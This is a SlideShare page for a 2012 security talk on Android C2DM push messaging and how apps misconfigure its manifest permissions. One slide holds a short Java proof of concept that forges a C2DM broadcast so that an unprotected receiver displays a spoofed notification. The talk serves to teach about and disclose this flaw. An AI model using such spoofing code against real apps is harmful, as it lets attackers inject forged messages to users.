Diese Präsentation wurde erfolgreich gemeldet.
Wir verwenden Ihre LinkedIn Profilangaben und Informationen zu Ihren Aktivitäten, um Anzeigen zu personalisieren und Ihnen relevantere Inhalte anzuzeigen. Sie können Ihre Anzeigeneinstellungen jederzeit ändern.

AC2DM For Security

102 Aufrufe

Veröffentlicht am

Talks about Google's Cloud to Device (C2D at the time this was written in 2012 - now known as Google Cloud Messaging) technology, and ways it can be misconfigured.

Veröffentlicht in: Technologie
  • Als Erste(r) kommentieren

  • Gehören Sie zu den Ersten, denen das gefällt!

AC2DM For Security

  1. 1. AC2DM for Security
  2. 2. Android C2DM Overview • Push notification for Android • Rides on Gtalk (XMPP) • Messages limited to 1024 bytes • Account limited to 200,000 messages per day
  3. 3. A confusing process Image taken from http://developer.cisco.com/web/cius-developer/blogroll/-/blogs/android-s-c2dm
  4. 4. Client Registration
  5. 5. App Registration
  6. 6. Message Send
  7. 7. Parts of a Message Required • Registration ID – sent by client • Collapse key – used to avoid flooding • Auth token – header from client login auth Optional • Data - payload • Delay while idle - flag
  8. 8. Manifest Components <permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE“ android:protectionLevel="signature" /> <!– Required to receive C2D messages --> <uses-permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE" /> <!– Required to register and receive registration results --> <uses-permission android:name="com.google.android.c2dm.permission.RECEIVE" /> <!– Internet required  <uses-permission android:name="android.permission.INTERNET" /> <application> <!-- Android C2DM registration receiver --> <receiver android:name=".c2dRegReceiver“ android:permission="com.google.android.c2dm.permission.SEND" > <intent-filter > <action android:name="com.google.android.c2dm.intent.REGISTRATION" ></action> <category android:name="com.intrepidusgroup.c2dm" /> </intent-filter> </receiver> <!-- Android C2DM message receiver --> <receiver android:name=".c2dMsgReceiver“ android:permission="com.google.android.c2dm.permission.SEND" > <intent-filter > <action android:name="com.google.android.c2dm.intent.RECEIVE" ></action> <category android:name="com.intrepidusgroup.c2dm" /> </intent-filter> </receiver> </application>
  9. 9. Real World <permission android:name="com.app.mobile.permission.C2D_MESSAGE" android:protectionLevel="signature" /> <uses-permission android:name="com.app.mobile.permission.C2D_MESSAGE" /> So far so good…
  10. 10. Real World <receiver android:name=".notifications.PushMsgReceiver" android:process=":notifications"> <intent-filter> <action android:name="com.google.android.c2dm.intent.RECEIVE" /> <category android:name="com.ebay.mobile" /> </intent-filter> <intent-filter> <action android:name="com.google.android.c2dm.intent.REGISTRATION" /> <category android:name="com.ebay.mobile" /> </intent-filter> </receiver> <!-- Only C2DM servers can send messages for the app. If permission is not set - any other app can generate it --> <receiver android:name=".C2DMReceiver" android:permission="com.google.android.c2dm.permission.SEND">
  11. 11. So… ZOMG!!
  12. 12. Example Push (seen in logcat) I/PushService( 3990): onHandleIntent: action=3, intent data=Bundle[{ itm=37524594341, push_action=3, title=message received from: jross, collapse_key=jrossig01, sound=m2mmsghdr.caf, evt=M2MMSGHDR, from=appid@gmail.com, usr=jross }]
  13. 13. Spoof (no cloud required) // declare the Intent final Intent sendC2DM = new Intent ("com.google.android.c2dm.intent.RECEIVE"); // set this as category com.app.mobile to match the intent-filter sendC2DM.addCategory("com.app.mobile"); // add the expected data elements sendC2DM.putExtra("itm", "37524594341"); sendC2DM.putExtra("push_action", "3"); sendC2DM.putExtra("title", "message recieved from: C2DSpoofer"); sendC2DM.putExtra("sound", "m2mmsghdr.caf"); sendC2DM.putExtra("evt", "M2MMSGHDR"); sendC2DM.putExtra("usr", send2usr); String collapse_key = randString.genString(rng, chars, 4); sendC2DM.putExtra("collapse_key", collapse_key); // send the message to the on-device push notification receiver sendBroadcast(sendC2DM);
  14. 14. What Happened? • App received a “C2D” message from another application installed on the device. • Because the permission wasn’t set correctly, it accepted the message as though it came from Google. • App displayed message notification, with the “malicious” payload intact.
  15. 15. Other Things We’ve Noticed • Messages that come in may not be accurately received by the activity they are sent to (see: demo). • If you have multiple devices, or multiple users on a single device, things may get tricky.
  16. 16. Questions? Contact: jason.ross@intrepidusgroup.com

×